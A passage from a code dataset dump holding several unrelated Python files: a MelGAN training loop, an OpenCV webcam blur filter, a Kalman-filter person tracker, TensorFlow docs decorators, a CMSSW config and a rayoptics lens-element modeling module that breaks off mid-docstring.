dataset.batch(cfg.batch_size, drop_remainder=True)\n\n # checkpoint save\n config_ck = CheckpointConfig(save_checkpoint_steps=cfg.save_steps, keep_checkpoint_max=100000)\n ckpt_cb = ModelCheckpoint(prefix=cfg.save_checkpoint_name, directory=cfg.save_checkpoint_path, config=config_ck)\n cb_params = _InternalCallbackParam()\n cb_params.train_network = gen_network_train_wrap\n cb_params.epoch_num = cfg.epoch_size\n run_context = RunContext(cb_params)\n ckpt_cb.begin(run_context)\n\n i = 1\n print(cfg.epoch_size)\n epoch_t = time.perf_counter()\n\n # epoch loop\n for epoch in range(cfg.epoch_size):\n cb_params.cur_epoch_num = epoch + 1\n for data, wav, datad, wavd in dataset.create_tuple_iterator():\n scaling_sens = Tensor(scale_manager.get_loss_scale(), dtype=mstype.float32)\n start = time.perf_counter()\n data = (data + 5.0) / 5.0\n datad = (datad + 5.0) / 5.0\n\n _, loss_G, cond_g = gen_network_train_wrap(Tensor(wav, mstype.float32), Tensor(data, mstype.float32),\n scaling_sens)\n\n _, loss_D, cond_d = dis_network_train_wrap(Tensor(datad, mstype.float32), Tensor(wavd, mstype.float32),\n scaling_sens)\n if cond_g:\n scale_manager.update_loss_scale(cond_g)\n else:\n scale_manager.update_loss_scale(False)\n if cond_d:\n scale_manager.update_loss_scale(cond_d)\n else:\n scale_manager.update_loss_scale(False)\n duration = time.perf_counter() - start\n\n print('{}epoch {}iter loss_G={} loss_D={} {:.2f}s/it'.format(epoch+1, i, loss_G.asnumpy(), loss_D.asnumpy(),\n duration))\n\n i = i + 1\n if cfg.rank == 0:\n cb_params.cur_step_num = i\n cb_params.batch_num = i\n ckpt_cb.step_end(run_context)\n\n duration = time.perf_counter() - epoch_t\n print('finish in {:.2f}mins'.format(duration / 60))\n\nif __name__ == \"__main__\":\n train()\n","sub_path":"official/audio/MELGAN/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"529330555","text":"# -*- coding: utf-8 -*-\r\nimport numpy as np\r\n\r\nimport cv2\r\n\r\nfrom matplotlib import pyplot as plt\r\n\r\n\r\ndef myfunc(i):\r\n\r\n pass # do nothing\r\n\r\n\r\n\r\ncv2.namedWindow('filter') # create win with win name\r\n\r\n\r\n\r\ncv2.createTrackbar('value', # name of value\r\n\r\n 'filter', # win name\r\n\r\n 0, # min\r\n\r\n 100, # max\r\n\r\n myfunc) # callback func\r\n\r\n\r\n\r\n\r\n\r\ncap = cv2.VideoCapture(0)\r\n\r\ncap.set(cv2.CAP_PROP_FRAME_WIDTH, 640)\r\n\r\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT, 480)\r\n\r\n\r\n\r\n\r\n\r\nwhile(True):\r\n\r\n\r\n\r\n ret, frame = cap.read()\r\n\r\n if not ret: continue\r\n\r\n\r\n\r\n\r\n\r\n v = cv2.getTrackbarPos('value', # get the value\r\n\r\n 'filter') # of the win\r\n\r\n\r\n\r\n ## do something by using v\r\n\r\n if v!=0:\r\n\r\n kernel = np.ones((v,v),np.float32)/(v**2)\r\n\r\n frame2 = cv2.filter2D(frame,-1,kernel)\r\n\r\n else:\r\n\r\n kernel = np.ones((1,1),np.float32)\r\n\r\n frame2 = cv2.filter2D(frame,-1,kernel)\r\n\r\n\r\n\r\n cv2.imshow('filter', frame2) # show in the win\r\n\r\n\r\n\r\n k = cv2.waitKey(1)\r\n\r\n if k == ord('q') or k == 27:\r\n\r\n break\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\ncap.release()\r\n\r\ncv2.destroyAllWindows()","sub_path":"filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"213275303","text":"import uuid\n\nimport numpy as np\nfrom filterpy.kalman import KalmanFilter\n\nfrom .utils import convert_bbox_to_sort_representation, convert_sort_representation_to_bbox\nfrom common.models import BasePersonTrack\n\n\nclass PersonBoxTracker(BasePersonTrack):\n \"\"\"\n This class is the base class for the tracked objects and contains its state.\n \"\"\"\n\n def __init__(self, bbox):\n \"\"\"\n Initialize the tracker using the initial bbox\n :param bbox: The initial bounding box\n \"\"\"\n super(PersonBoxTracker, self).__init__()\n self.kalman_filter = KalmanFilter(dim_x=7, dim_z=4) # Constant velocity model\n self.kalman_filter.F = np.array(\n [[1, 0, 0, 0, 1, 0, 0], [0, 1, 0, 0, 0, 1, 0], [0, 0, 1, 0, 0, 0, 1], [0, 0, 0, 1, 0, 0, 0],\n [0, 0, 0, 0, 1, 0, 0], [0, 0, 0, 0, 0, 1, 0], [0, 0, 0, 0, 0, 0, 1]])\n self.kalman_filter.H = np.array(\n [[1, 0, 0, 0, 0, 0, 0], [0, 1, 0, 0, 0, 0, 0], [0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 1, 0, 0, 0]])\n\n self.kalman_filter.R[2:, 2:] *= 10.\n self.kalman_filter.P[4:, 4:] *= 1000. # give high uncertainty to the unobservable initial velocities\n self.kalman_filter.P *= 10.\n self.kalman_filter.Q[-1, -1] *= 0.01\n self.kalman_filter.Q[4:, 4:] *= 0.01\n\n self.kalman_filter.x[:4] = convert_bbox_to_sort_representation(bbox[:4]).reshape((4, -1))\n self.__id = uuid.uuid4()\n self.time_since_update = 0\n self.history = []\n self.hits = 0\n self.hit_streak = 0\n self.age = 0\n\n def update(self, bbox):\n \"\"\"\n Updates the object with the observed bbox\n :param bbox:\n :return:\n \"\"\"\n self.time_since_update = 0\n self.history = []\n self.hits += 1\n self.hit_streak += 1\n self.kalman_filter.update(convert_bbox_to_sort_representation(bbox[:4]))\n\n def predict(self):\n \"\"\"\n Advances the state vector and returns the predicted bounding box estimate\n :return:\n \"\"\"\n if (self.kalman_filter.x[6] + self.kalman_filter.x[2]) <= 0:\n self.kalman_filter.x[6] *= 0.0\n self.kalman_filter.predict()\n self.age += 1\n if self.time_since_update > 0:\n self.hit_streak = 0\n self.time_since_update += 1\n self.history.append(convert_sort_representation_to_bbox(self.kalman_filter.x).reshape((-1, 4)))\n return self.history[-1]\n\n @property\n def id(self):\n return self.__id.hex\n\n @property\n def bbox(self):\n \"\"\"\n Returns the current bounding box estimate\n :return:\n \"\"\"\n return convert_sort_representation_to_bbox(self.kalman_filter.x)\n","sub_path":"sort/person_box_tracker.py","file_name":"person_box_tracker.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"111780987","text":"# coding=utf-8\n# Copyright 2021 The TensorFlow Datasets Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Documentation utils for the website.\n\nNote: To be detected, doc decorators should be applied between descriptors\nand other decorators.\n\n```py\nclass A:\n\n @staticmethod\n @tfds.core.utils.docs.deprecated\n @other_decorator\n def f():\n pass\n```\n\n\"\"\"\n\nfrom tensorflow.tools.docs import doc_controls # pylint: disable=g-direct-tensorflow-import\n\n\ndef _no_op_decorator(obj):\n return obj\n\n\ntry:\n deprecated = doc_controls.set_deprecated\n doc_private = doc_controls.doc_private\n do_not_doc = doc_controls.do_not_generate_docs\n # Same as `do_not_doc`, but also applied to childs\n do_not_doc_inheritable = doc_controls.do_not_doc_inheritable\n # Document the parent, but not the childs\n do_not_doc_in_subclasses = doc_controls.do_not_doc_in_subclasses\nexcept AttributeError:\n # Decorators are only required by `tensorflow_docs` which uses tf-nightly\n # It can be no-op for older versions of TF.\n deprecated = _no_op_decorator\n doc_private = _no_op_decorator\n do_not_doc = _no_op_decorator\n do_not_doc_inheritable = _no_op_decorator\n do_not_doc_in_subclasses = _no_op_decorator\n","sub_path":"tensorflow_datasets/core/utils/docs.py","file_name":"docs.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"504962976","text":"import FWCore.ParameterSet.Config as cms\r\n\r\nrunProcess = cms.PSet(\r\n input = cms.string(\"/data/Analysis/42x/DYJetsToLL.root\"),\r\n outdir = cms.string(\"./\"),\r\n useFitter=cms.bool(False),\r\n isMC = cms.bool(True),\r\n evStart = cms.int32(0),\r\n evEnd = cms.int32(10000),\r\n dirName = cms.string(\"evAnalyzer/data\"),\r\n jobfile = cms.string(\"./test/xsec_42X.txt\"),\r\n )\r\n","sub_path":"MyAnalysis/ZXSection/test/BU_runAnalysis_cfg.py","file_name":"BU_runAnalysis_cfg.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"398995344","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Copyright © 2018 Michael J. Hayford\n\"\"\" Module for element modeling\n\n.. Created on Sun Jan 28 16:27:01 2018\n\n.. codeauthor: Michael J. Hayford\n\"\"\"\n\nfrom collections import namedtuple\nimport itertools\nfrom packaging import version\n\nimport numpy as np\n\nfrom anytree import Node\n\nimport rayoptics\n\nimport rayoptics.util.rgbtable as rgbt\nimport rayoptics.oprops.thinlens as thinlens\nfrom rayoptics.elem import parttree\nfrom rayoptics.elem.profiles import Spherical, Conic\nfrom rayoptics.elem.surface import Surface\nfrom rayoptics.seq.gap import Gap\nfrom rayoptics.seq.medium import Glass, glass_decode\n\nimport rayoptics.gui.appcmds as cmds\nfrom rayoptics.gui.actions import (Action, AttrAction, SagAction, BendAction,\n ReplaceGlassAction)\n\nimport opticalglass.glassfactory as gfact\nimport opticalglass.glasspolygons as gp\n\nGraphicsHandle = namedtuple('GraphicsHandle', ['polydata', 'tfrm', 'polytype',\n 'color'], defaults=(None,))\nGraphicsHandle.polydata.__doc__ = \"poly data in local coordinates\"\nGraphicsHandle.tfrm.__doc__ = \"global transformation for polydata\"\nGraphicsHandle.polytype.__doc__ = \"'polygon' (for filled) or 'polyline'\"\nGraphicsHandle.color.__doc__ = \"RGBA for the polydata or None for default\"\n\n\n\"\"\" tuple grouping together graphics rendering data\n\n Attributes:\n polydata: poly data in local coordinates\n tfrm: global transformation for polydata\n polytype: 'polygon' (for filled) or 'polyline'\n\"\"\"\n\n\n# --- Factory functions\ndef create_thinlens(power=0., indx=1.5, sd=None, **kwargs):\n tl = thinlens.ThinLens(power=power, ref_index=indx, max_ap=sd, **kwargs)\n tle = ThinElement(tl)\n tree = tle.tree()\n return [[tl, None, None, 1, +1]], [tle], tree\n\n\ndef create_mirror(c=0.0, r=None, cc=0.0, ec=None,\n power=None, profile=None, sd=None, **kwargs):\n '''Create a sequence and element for a mirror.\n\n Args:\n c: vertex curvature\n r: vertex radius of curvature\n cc: conic constant\n ec: 1 + cc\n power: optical power of the mirror\n sd: semi-diameter\n profile: Spherical or Conic type, or a profile instance\n '''\n delta_n = kwargs['delta_n'] if 'delta_n' in kwargs else -2\n if power:\n cv = power/delta_n\n elif r:\n cv = 1.0/r\n else:\n cv = c\n\n if ec:\n k = ec - 1.0\n else:\n k = cc\n\n if profile is Spherical:\n prf = Spherical(c=cv)\n elif profile is Conic:\n prf = Conic(c=cv, cc=k)\n elif profile is not None:\n prf = profile\n else:\n if k == 0.0:\n prf = Spherical(c=cv)\n else:\n prf = Conic(c=cv, cc=k)\n\n m = Surface(profile=prf, interact_mode='reflect', max_ap=sd,\n delta_n=delta_n, **kwargs)\n ele_kwargs = {'label': kwargs['label']} if 'label' in kwargs else {}\n me = Mirror(m, sd=sd, **ele_kwargs)\n\n tree = me.tree()\n\n return [[m, None, None, 1, -1]], [me], tree\n\n\ndef lens_from_power(power=0., bending=0., th=None, sd=1.,\n med=None, nom_wvl='d'):\n if med is None:\n med = Glass()\n rndx = med.rindex(nom_wvl)\n\n if th is None:\n th = sd/5\n \n if bending == -1:\n cv2 = -power/(rndx - 1)\n cv1 = 0\n else:\n B = (bending - 1)/(bending + 1)\n a = (rndx - 1)*(th/rndx)*B\n b = 1 - B\n c = -power/(rndx - 1)\n cv1 = (-b + np.sqrt(b**2 - 4*a*c))/(2*a)\n cv2 = cv1*B\n\n return cv1, cv2, th, rndx, sd\n \n\ndef create_lens(power=0., bending=0., th=None, sd=1., med=None, **kwargs):\n if med is None:\n med = Glass()\n lens = lens_from_power(power=power, bending=bending, th=th, sd=sd,\n med=med)\n cv1, cv2, th, rndx, sd = lens\n\n s1 = Surface(profile=Spherical(c=cv1), max_ap=sd, delta_n=(rndx - 1))\n s2 = Surface(profile=Spherical(c=cv2), max_ap=sd, delta_n=(1 - rndx))\n g = Gap(t=th, med=med)\n le = Element(s1, s2, g, sd=sd)\n tree = le.tree()\n\n return [[s1, g, None, rndx, 1], [s2, None, None, 1, 1]], [le], tree\n\n\ndef achromat(power, Va, Vb):\n \"\"\"Compute lens powers for a thin doublet achromat, given their V-numbers.\"\"\"\n power_a = (Va/(Va - Vb))*power\n power_b = (Vb/(Vb - Va))*power\n return power_a, power_b\n\n\ndef create_cemented_doublet(power=0., bending=0., th=None, sd=1.,\n glasses=('N-BK7,Schott', 'N-F2,Schott'),\n **kwargs):\n from opticalglass.spectral_lines import get_wavelength\n from opticalglass import glass\n wvls = np.array([get_wavelength(w) for w in ['d', 'F', 'C']])\n gla_a = gfact.create_glass(glasses[0])\n rndx_a = gla_a.calc_rindex(wvls)\n Va, PcDa = glass.calc_glass_constants(*rndx_a)\n gla_b = gfact.create_glass(glasses[1])\n rndx_b = gla_b.calc_rindex(wvls)\n Vb, PcDb = glass.calc_glass_constants(*rndx_b)\n\n power_a, power_b = achromat(power, Va, Vb)\n\n if th is None:\n th = sd/4\n t1 = 3*th/4\n t2 = th/4\n if power_a < 0:\n t1, t2 = t2, t1\n\n lens_a = lens_from_power(power=power_a, bending=bending, th=t1, sd=sd,\n med=gla_a)\n cv1, cv2, t1, indx_a, sd = lens_a\n\n # cv1 = power_a/(rndx_a[0] - 1)\n # delta_cv = -cv1/2\n # cv1 += delta_cv\n # cv2 = delta_cv\n # cv3 = power_b/(1 - rndx_b[0]) + delta_cv\n indx_b = rndx_b[0]\n cv3 = (power_b/(indx_b-1) - cv2)/((t2*cv2*(indx_b-1)/indx_b) - 1)\n\n s1 = Surface(profile=Spherical(c=cv1), max_ap=sd,\n delta_n=(rndx_a[0] - 1))\n s2 = Surface(profile=Spherical(c=cv2), max_ap=sd,\n delta_n=(rndx_b[0] - rndx_a[0]))\n s3 = Surface(profile=Spherical(c=cv3), max_ap=sd,\n delta_n=(1 - rndx_b[0]))\n\n g1 = Gap(t=t1, med=gla_a)\n g2 = Gap(t=t2, med=gla_b)\n\n g_tfrm = np.identity(3), np.array([0., 0., 0.])\n\n ifc_list = []\n ifc_list.append([0, s1, g1, 1, g_tfrm])\n ifc_list.append([1, s2, g2, 1, g_tfrm])\n ifc_list.append([2, s3, None, 1, g_tfrm])\n ce = CementedElement(ifc_list)\n tree = ce.tree()\n\n return [[s1, g1, None, rndx_a, 1],\n [s2, g2, None, rndx_b, 1],\n [s3, None, None, 1, 1]], [ce], tree\n\n\ndef create_dummy_plane(sd=1., **kwargs):\n s = Surface(**kwargs)\n se = DummyInterface(s, sd=sd)\n tree = se.tree()\n return [[s, None, None, 1, +1]], [se], tree\n\n\ndef create_air_gap(t=0., **kwargs):\n g = Gap(t=t)\n ag = AirGap(g, **kwargs)\n tree = ag.tree()\n return g, ag, tree\n\n\ndef create_from_file(filename, **kwargs):\n opm = cmds.open_model(filename)\n sm = opm['seq_model']\n osp = opm['optical_spec']\n em = opm['ele_model']\n pt = opm['part_tree']\n if len(pt.nodes_with_tag(tag='#element')) == 0:\n parttree.elements_from_sequence(em, sm, pt)\n if 'power' in kwargs:\n desired_power = kwargs['power']\n cur_power = osp.parax_data.fod.power\n # scale_factor is linear, power is 1/linear\n # so use reciprocal of power to compute scale_factor\n scale_factor = cur_power/desired_power\n sm.apply_scale_factor(scale_factor)\n seq = [list(node) for node in sm.path(start=1, stop=-1)]\n seq[-1][2] = None\n sys_nodes = pt.nodes_with_tag(tag='#element#airgap',\n not_tag='#object#image')\n eles = [node.id for node in sys_nodes]\n root = Node('file', id=None, tag='#group', children=sys_nodes)\n return seq, eles, root\n\n\ndef calc_render_color_for_material(matl):\n \"\"\" get element color based on V-number of glass\"\"\"\n try:\n gc = float(matl.glass_code())\n except AttributeError:\n return (255, 255, 255, 64) # white\n else:\n # set element color based on V-number\n indx, vnbr = glass_decode(gc)\n dsg, rgb = gp.find_glass_designation(indx, vnbr)\n if rgb is None:\n return [228, 237, 243, 64] # ED designation\n# rgb = Element.clut.get_color(vnbr)\n return rgb\n\n\n# --- Element definitions\nclass Element():\n \"\"\"Lens element domain model. Manage rendering and selection/editing.\n\n An Element consists of 2 Surfaces, 1 Gap, and edge_extent information.\n\n Attributes:\n parent: the :class:`ElementModel`\n label: string identifier\n s1: first/origin :class:`~rayoptics.seq.interface.Interface`\n s2: second/last :class:`~rayoptics.seq.interface.Interface`\n gap: element thickness and material :class:`~rayoptics.seq.gap.Gap`\n tfrm: global transform to element origin, (Rot3, trans3)\n medium_name: the material filling the gap\n flat1, flat2: semi-diameter of flat or None. Setting to None will result in \n re-evaluation of flat ID\n do_flat1, do_flat2: 'if concave', 'always', 'never', 'if convex'\n handles: dict of graphical entities\n actions: dict of actions associated with the graphical handles\n \"\"\"\n clut = rgbt.RGBTable(filename='red_blue64.csv',\n data_range=[10.0, 100.])\n\n label_format = 'E{}'\n serial_number = 0\n\n def __init__(self, s1, s2, g, tfrm=None, idx=0, idx2=1, sd=1.,\n label=None):\n if label is None:\n Element.serial_number += 1\n self.label = Element.label_format.format(Element.serial_number)\n else:\n self.label = label\n\n if tfrm is not None:\n self.tfrm = tfrm\n else:\n self.tfrm = (np.identity(3), np.array([0., 0., 0.]))\n self.s1 = s1\n self.s1_indx = idx\n self.s2 = s2\n self.s2_indx = idx2\n self.gap = g\n self.medium_name = self.gap.medium.name()\n self._sd = sd\n self.flat1 = None\n self.flat2 = None\n self.do_flat1 = 'if concave' # alternatives are 'never', 'always',\n self.do_flat2 = 'if concave' # or 'if convex'\n self.handles = {}\n self.actions = {}\n\n @property\n def sd(self):\n \"\"\"Semi-diameter \"\"\"\n return self._sd\n\n @sd.setter\n def sd(self, semidiam):\n self._sd = semidiam\n self.edge_extent = (-semidiam, semidiam)\n\n def __json_encode__(self):\n attrs = dict(vars(self))\n del attrs['parent']\n del attrs['tfrm']\n del attrs['s1']\n del attrs['s2']\n del attrs['gap']\n del attrs['handles']\n del attrs['actions']\n return attrs\n\n def __str__(self):\n fmt = 'Element: {!r}, {!r}, t={:.4f}, sd={:.4f}, glass: {}'\n return fmt.format(self.s1.profile, self.s2.profile, self.gap.thi,\n self.sd, self.gap.medium.name())\n\n def sync_to_restore(self, ele_model, surfs, gaps, tfrms):\n # when restoring, we want to use the stored indices to look up the\n # new object instances\n self.parent = ele_model\n self.tfrm = tfrms[self.s1_indx]\n self.s1 = surfs[self.s1_indx]\n self.gap = gaps[self.s1_indx]\n self.s2 = surfs[self.s2_indx]\n if not hasattr(self, 'medium_name'):\n self.medium_name = self.gap.medium.name()\n if not hasattr(self, 'do_flat1'):\n self.do_flat1 = 'if concave'\n if not hasattr(self, 'do_flat2'):\n self.do_flat2 = 'if concave'\n\n def sync_to_update(self, seq_model):\n # when updating, we want to use the stored object instances to get the\n # current indices into the interface list (e.g. to handle insertion and\n # deletion of interfaces)\n self.s1_indx = seq_model.ifcs.index(self.s1)\n self.s2_indx = seq_model.ifcs.index(self.s2)\n self.medium_name = self.gap.medium.name()\n\n def tree(self, **kwargs):\n \"\"\"Build tree linking sequence to element model. \"\"\"\n\n default_tag = '#element#lens'\n tag = default_tag + kwargs.get('tag', '')\n zdir = kwargs.get('z_dir', 1)\n\n # Interface branch 1\n e = Node('E', id=self, tag=tag)\n p1 = Node('p1', id=self.s1.profile, tag='#profile', parent=e)\n Node(f'i{self.s1_indx}', id=self.s1, tag='#ifc', parent=p1)\n\n # Gap branch\n t = Node('t', id=self.gap, tag='#thic', parent=e)\n Node(f'g{self.s1_indx}', id=(self.gap, zdir), tag='#gap', parent=t)\n\n # Interface branch 2\n p2 = Node('p2', id=self.s2.profile, tag='#profile', parent=e)\n Node(f'i{self.s2_indx}', id=self.s2, tag='#ifc', parent=p2)\n\n return e\n\n def reference_interface(self):\n return self.s1\n\n def reference_idx(self):\n return self.s1_indx\n\n def interface_list(self):\n return [self.s1, self.s2]\n\n def gap_list(self):\n return [self.gap]\n\n def get_bending(self):\n cv1 = self.s1.profile_cv\n cv2 = self.s2.profile_cv\n delta_cv = cv1 - cv2\n bending = 0.\n if delta_cv != 0.0:\n bending = (cv1 + cv2)/delta_cv\n return bending\n\n def set_bending(self, bending):\n cv1 = self.s1.profile_cv\n cv2 = self.s2.profile_cv\n delta_cv = cv1 - cv2\n cv2_new = 0.5*(bending - 1.)*delta_cv\n cv1_new = bending*delta_cv - cv2_new\n self.s1.profile_cv = cv1_new\n self.s2.profile_cv = cv2_new\n\n def update_size(self):\n extents = np.union1d(self.s1.get_y_aperture_extent(),\n self.s2.get_y_aperture_extent())\n self.edge_extent = (extents[0], extents[-1])\n self.sd = max(self.s1.surface_od(), self.s2.surface_od())\n return self.sd\n\n def compute_flat(self, s):\n ca = s.surface_od()\n if (1.0 - ca/self.sd) >= 0.05:\n flat = ca\n else:\n flat = None\n return flat\n\n def extent(self):\n if hasattr(self, 'edge_extent'):\n return self.edge_extent\n else:\n return (-self.sd, self.sd)\n\n def render_shape(self):\n def use_flat(do_flat, is_concave):\n if do_flat == 'always':\n return True\n elif do_flat == 'is concave' and is_concave:\n return True\n elif do_flat == 'is convex' and not is_concave:\n return True\n return False\n is_concave_s1 = self.s1.profile_cv < 0.0\n is_concave_s2 = self.s2.profile_cv > 0.0\n\n if use_flat(self.do_flat1, is_concave_s1):\n if self.flat1 is None:\n flat1 = self.flat1 = self.compute_flat(self.s1)\n else:\n flat1 = self.flat1\n else:\n flat1 = None\n poly = self.s1.full_profile(self.extent(), flat1)\n\n if use_flat(self.do_flat2, is_concave_s2):\n if self.flat2 is None:\n flat2 = self.flat2 = self.compute_flat(self.s2)\n else:\n flat2 = self.flat2\n else:\n flat2 = None\n poly2 = self.s2.full_profile(self.extent(), flat2, -1)\n\n for p in poly2:\n p[0] += self.gap.thi\n poly += poly2\n poly.append(poly[0])\n return poly\n\n def render_handles(self, opt_model):\n self.handles = {}\n ifcs_gbl_tfrms = opt_model.seq_model.gbl_tfrms\n\n shape = self.render_shape()\n color = calc_render_color_for_material(self.gap.medium)\n self.handles['shape'] = GraphicsHandle(shape, self.tfrm, 'polygon',\n color)\n\n extent = self.extent()\n if self.flat1 is not None:\n extent_s1 = self.flat1,\n else:\n extent_s1 = extent\n poly_s1 = self.s1.full_profile(extent_s1, None)\n gh1 = GraphicsHandle(poly_s1, ifcs_gbl_tfrms[self.s1_indx], 'polyline')\n self.handles['s1_profile'] = gh1\n\n if self.flat2 is not None:\n extent_s2 = self.flat2,\n else:\n extent_s2 = extent\n poly_s2 = self.s2.full_profile(extent_s2, None, -1)\n gh2 = GraphicsHandle(poly_s2, ifcs_gbl_tfrms[self.s2_indx], 'polyline')\n self.handles['s2_profile'] = gh2\n\n poly_sd_upr = []\n poly_sd_upr.append([poly_s1[-1][0], extent[1]])\n poly_sd_upr.append([poly_s2[0][0]+self.gap.thi, extent[1]])\n self.handles['sd_upr'] = GraphicsHandle(poly_sd_upr, self.tfrm,\n 'polyline')\n\n poly_sd_lwr = []\n poly_sd_lwr.append([poly_s2[-1][0]+self.gap.thi, extent[0]])\n poly_sd_lwr.append([poly_s1[0][0], extent[0]])\n self.handles['sd_lwr'] = GraphicsHandle(poly_sd_lwr, self.tfrm,\n 'polyline')\n\n poly_ct = []\n poly_ct.append([0., 0.])\n poly_ct.append([self.gap.thi, 0.])\n self.handles['ct'] = GraphicsHandle(poly_ct, self.tfrm, 'polyline')\n\n return self.handles\n\n def handle_actions(self):\n self.actions = {}\n\n shape_actions = {}\n shape_actions['pt'] = BendAction(self)\n shape_actions['y'] = AttrAction(self, 'sd')\n shape_actions['glass'] = ReplaceGlassAction(self.gap)\n self.actions['shape'] = shape_actions\n\n s1_prof_actions = {}\n s1_prof_actions['pt'] = SagAction(self.s1)\n self.actions['s1_profile'] = s1_prof_actions\n\n s2_prof_actions = {}\n s2_prof_actions['pt'] = SagAction(self.s2)\n self.actions['s2_profile'] = s2_prof_actions\n\n sd_upr_action = {}\n sd_upr_action['y'] = AttrAction(self, 'sd')\n self.actions['sd_upr'] = sd_upr_action\n\n sd_lwr_action = {}\n sd_lwr_action['y'] = AttrAction(self, 'sd')\n self.actions['sd_lwr'] = sd_lwr_action\n\n ct_action = {}\n ct_action['x'] = AttrAction(self.gap, 'thi')\n self.actions['ct'] = ct_action\n\n return self.actions\n\n\nclass Mirror():\n\n label_format = 'M{}'\n serial_number = 0\n\n def __init__(self, ifc, tfrm=None, idx=0, sd=1., thi=None, z_dir=1.0,\n label=None):\n if label is None:\n Mirror.serial_number += 1\n self.label = Mirror.label_format.format(Mirror.serial_number)\n else:\n self.label = label\n\n self.render_color = (158, 158, 158, 64)\n if tfrm is not None:\n self.tfrm = tfrm\n else:\n self.tfrm = (np.identity(3), np.array([0., 0., 0.]))\n self.s = ifc\n self.s_indx = idx\n self.z_dir = z_dir\n self.sd = sd\n self.flat = None\n self.thi = thi\n self.medium_name = 'Mirror'\n self.handles = {}\n self.actions = {}\n\n def get_thi(self):\n thi = self.thi\n if self.thi is None:\n thi = 0.05*self.sd\n return thi\n\n def __json_encode__(self):\n attrs = dict(vars(self))\n del attrs['parent']\n del attrs['tfrm']\n del attrs['s']\n del attrs['handles']\n del attrs['actions']\n return attrs\n\n def __str__(self):\n thi = self.get_thi()\n fmt = 'Mirror: {!r}, t={:.4f}, sd={:.4f}'\n return fmt.format(self.s.profile, thi, self.sd)\n\n def sync_to_restore(self, ele_model, surfs, gaps, tfrms):\n self.parent = ele_model\n self.tfrm = tfrms[self.s_indx]\n self.s = surfs[self.s_indx]\n if not hasattr(self, 'medium_name'):\n self.medium_name = 'Mirror'\n\n def sync_to_update(self, seq_model):\n self.s_indx = seq_model.ifcs.index(self.s)\n\n def tree(self, **kwargs):\n default_tag = '#element#mirror'\n tag = default_tag + kwargs.get('tag', '')\n # Interface branch\n m = Node('M', id=self, tag=tag)\n p = Node('p', id=self.s.profile, tag='#profile', parent=m)\n Node(f'i{self.s_indx}', id=self.s, tag='#ifc', parent=p)\n\n # Gap branch = None\n\n return m\n\n def reference_interface(self):\n return self.s\n\n def reference_idx(self):\n return self.s_indx\n\n def interface_list(self):\n return [self.s]\n\n def gap_list(self):\n return []\n\n def update_size(self):\n self.edge_extent = self.s.get_y_aperture_extent()\n self.sd = self.s.surface_od()\n return self.sd\n\n def extent(self):\n if hasattr(self, 'edge_extent'):\n return self.edge_extent\n else:\n self.edge_extent = self.s.get_y_aperture_extent()\n return self.edge_extent\n\n def substrate_offset(self):\n thi = self.get_thi()\n # We want to extend the mirror substrate along the same direction\n # of the incoming ray. The mirror's z_dir is following reflection so\n # flip the sign to get the preceding direction.\n offset = -self.z_dir*thi\n return offset\n\n def render_shape(self):\n poly = self.s.full_profile(self.extent(), self.flat)\n poly2 = self.s.full_profile(self.extent(), self.flat, -1)\n\n offset = self.substrate_offset()\n\n for p in poly2:\n p[0] += offset\n poly += poly2\n poly.append(poly[0])\n return poly\n\n def render_handles(self, opt_model):\n self.handles = {}\n ifcs_gbl_tfrms = opt_model.seq_model.gbl_tfrms\n\n self.handles['shape'] = GraphicsHandle(self.render_shape(), self.tfrm,\n 'polygon', self.render_color)\n\n poly = self.s.full_profile(self.extent(), None)\n self.handles['s_profile'] = GraphicsHandle(poly,\n ifcs_gbl_tfrms[self.s_indx],\n 'polyline')\n\n offset = self.substrate_offset()\n\n poly_sd_upr = []\n poly_sd_upr.append(poly[-1])\n poly_sd_upr.append([poly[-1][0]+offset, poly[-1][1]])\n self.handles['sd_upr'] = GraphicsHandle(poly_sd_upr, self.tfrm,\n 'polyline')\n\n poly_sd_lwr = []\n poly_sd_lwr.append(poly[0])\n poly_sd_lwr.append([poly[0][0]+offset, poly[0][1]])\n self.handles['sd_lwr'] = GraphicsHandle(poly_sd_lwr, self.tfrm,\n 'polyline')\n\n return self.handles\n\n def handle_actions(self):\n self.actions = {}\n\n shape_actions = {}\n shape_actions['pt'] = SagAction(self.s)\n self.actions['shape'] = shape_actions\n\n s_prof_actions = {}\n s_prof_actions['pt'] = SagAction(self.s)\n self.actions['s_profile'] = s_prof_actions\n\n sd_upr_action = {}\n sd_upr_action['y'] = AttrAction(self, 'edge_extent[1]')\n self.actions['sd_upr'] = sd_upr_action\n\n sd_lwr_action = {}\n sd_lwr_action['y'] = AttrAction(self, 'edge_extent[0]')\n self.actions['sd_lwr'] = sd_lwr_action\n\n return self.actions\n\n\nclass CementedElement():\n \"\"\"Cemented element domain model. Manage rendering and selection/editing.\n\n A CementedElement consists of 3 or more Surfaces, 2 or more Gaps, and\n edge_extent information.\n\n Attributes:\n parent: the :class:`ElementModel`\n label: string identifier\n idxs: list of seq_model interface indices\n ifcs: list of :class:`~rayoptics.seq.interface.Interface`\n gaps: list of thickness and material :class:`~rayoptics.seq.gap.Gap`\n tfrm: global transform to element origin, (Rot3, trans3)\n medium_name: the material filling the gap\n flats: semi-diameter of flat if ifc is concave, or None\n 